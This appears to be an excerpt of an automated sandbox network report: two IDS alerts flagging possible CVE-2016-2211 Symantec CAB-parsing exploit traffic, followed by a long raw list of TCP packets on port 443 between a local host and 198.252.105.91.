                                                                                                                              2024-11-11T18:02:43.410691+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849709TCP
                                                                                                                              2024-11-11T18:03:21.873238+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849721TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 11, 2024 18:02:27.100097895 CET49705443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:27.100158930 CET44349705198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:27.100244999 CET49705443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:27.103605986 CET49705443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:27.103652954 CET44349705198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:27.103801012 CET49705443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:27.366653919 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:27.366702080 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:27.366780996 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:27.396251917 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:27.396275997 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.043755054 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.043829918 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.056566000 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.056593895 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.056947947 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.105892897 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.177666903 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.223344088 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.308994055 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.359966040 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.359982014 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.389985085 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.389996052 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.390043020 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.390060902 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.390074968 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.390079021 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.390094995 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.390105963 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.390126944 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.390147924 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.391892910 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.391902924 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.391937017 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.391961098 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.391976118 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.391985893 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.392015934 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.392035007 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.471308947 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.471337080 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.471407890 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.471419096 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.471575975 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.472090960 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.472106934 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.472165108 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.472173929 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.472220898 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.472934008 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.472950935 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.473007917 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.473016024 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.473058939 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.474145889 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.474165916 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.474236012 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.474242926 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.474286079 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.861131907 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.861146927 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.861181974 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.861222029 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.861248016 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.861279964 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.861299992 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.862390995 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.862409115 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.862458944 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.862467051 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.862505913 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.862520933 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.863389969 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.863406897 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.863456964 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.863466024 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.863498926 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.863526106 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.864346981 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.864366055 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.864422083 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.864432096 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.864475012 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.865333080 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.865350962 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.865395069 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.865401983 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.865425110 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.865458965 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.866677046 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.866705894 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.866753101 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.866760969 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.866787910 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.866806030 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.867297888 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.867324114 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.867366076 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.867381096 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.867391109 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.867425919 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.868427038 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.868444920 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.868516922 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.868527889 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.868577003 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.868993998 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.869014025 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.869087934 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.869096994 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.869138002 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.869947910 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.869966030 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.870013952 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.870023012 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.870050907 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.870069027 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.870614052 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.870630980 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.870668888 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.870676041 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.870707035 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.870729923 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.871584892 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.871608973 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.871648073 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.871655941 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.871680021 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.871701002 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.872962952 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.872981071 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.873034000 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.873043060 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.873080969 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.873584986 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.873603106 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.873662949 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.873671055 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.873684883 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.873716116 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.874414921 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.874432087 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.874490023 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.874497890 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.874541998 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.875125885 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.875143051 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.875191927 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.875200033 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.875242949 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.876127958 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.876161098 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.876189947 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.876200914 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.876234055 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.876254082 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.876851082 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.876866102 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.876918077 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.876925945 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.876966953 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.877425909 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.877460957 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.877501011 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.877510071 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.877552032 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.877576113 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.878360033 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.878376007 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.878426075 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.878432989 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.878468990 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.878492117 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.879237890 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.879266024 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.879300117 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.879308939 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.879355907 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.880207062 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.880230904 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.880244017 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.880256891 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.880269051 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.880316973 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.880759001 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.880775928 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.880826950 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.880836964 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.880867958 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.880887985 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.881747007 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.881762028 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.881800890 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.881812096 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.881843090 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.881874084 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.882138968 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.882154942 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.882200003 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.882205963 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.882236004 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.882261038 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.883101940 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.883119106 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.883167028 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.883174896 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.883209944 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.883229971 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.883630037 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.883654118 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.883692026 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.883699894 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.883729935 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.883744001 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.884439945 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.884455919 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.884496927 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.884507895 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.884520054 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.884552956 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.884591103 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.885314941 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.885329962 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.885371923 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.885379076 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.885402918 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.885859013 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.885895014 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.885916948 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.885925055 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.885956049 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.886590958 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.886605024 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.886641979 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.886653900 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.886660099 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.886672974 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.886698008 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.886734962 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.887588024 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.887603998 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.887670040 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.887677908 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.887731075 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.888242960 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.888261080 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.888313055 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.888322115 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.888365984 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.888493061 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.888595104 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.888609886 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.888662100 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.888669968 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.888699055 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.888717890 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.889431000 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.889450073 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.889492989 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.889501095 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.889511108 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.889529943 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.889532089 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.889561892 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.889569044 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.889584064 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.889929056 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.889929056 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.890367031 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.890382051 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.890428066 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.890446901 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.890455961 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.890484095 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.890520096 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.891395092 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.891412020 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.891458035 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.891464949 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.891484022 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.891494036 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.891506910 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.891541958 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.891549110 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.891581059 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.892363071 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.892375946 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.892421007 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.892437935 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.892437935 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.892452002 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.892461061 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.892494917 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.892525911 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.893331051 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.893373013 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.893395901 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.893404961 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.893428087 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.893446922 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.894109964 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.894129992 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.894167900 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.894175053 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.894193888 CET49706443192.168.2.8198.252.105.91
                                                                                                                              Nov 11, 2024 18:02:28.894195080 CET44349706198.252.105.91192.168.2.8
                                                                                                                              Nov 11, 2024 18:02:28.894220114 CET44349706198.252.105.91192.168.2.8
